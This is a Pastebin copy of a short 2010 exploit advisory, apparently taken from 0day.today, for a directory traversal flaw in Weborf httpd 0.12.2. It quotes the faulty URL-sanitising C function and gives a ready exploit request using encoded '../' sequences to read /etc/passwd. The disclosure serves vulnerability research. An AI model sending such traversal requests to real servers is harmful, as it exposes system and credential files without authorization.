Advertisement
Guest User

Untitled

a guest
Dec 10th, 2019
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.03 KB | None | 0 0
  1.  
  2. windows
  3. ==================================================
  4. Weborf <= 0.12.2 Directory Traversal Vulnerability
  5. ==================================================
  6.  
  7. Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
  8. Date: Sep 6, 2010
  9. Author: Rew
  10. Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
  11. Version: 0.12.2
  12. Tested On: Debian 5
  13. CVE: N/A
  14.  
  15. =============================================================
  16.  
  17. Weborf httpd <= 0.12.2 suffers a directory traversal
  18. vulnerability. This vulnerability could allow
  19. attackers to read arbitrary files and hak th3 plan3t.
  20.  
  21. instance.c : line 240-244
  22. ------------------------------
  23. void modURL(char* url) {
  24. //Prevents the use of .. to access the whole filesystem <-- ORLY?
  25. strReplace(url,"../",'\0');
  26.  
  27. replaceEscape(url);
  28. ------------------------------
  29.  
  30. Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  31.  
  32. ==============================================================
  33.  
  34. Stay safe,
  35. Over and Out
  36.  
  37.  
  38.  
  39. # 0day.today [2019-12-10] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement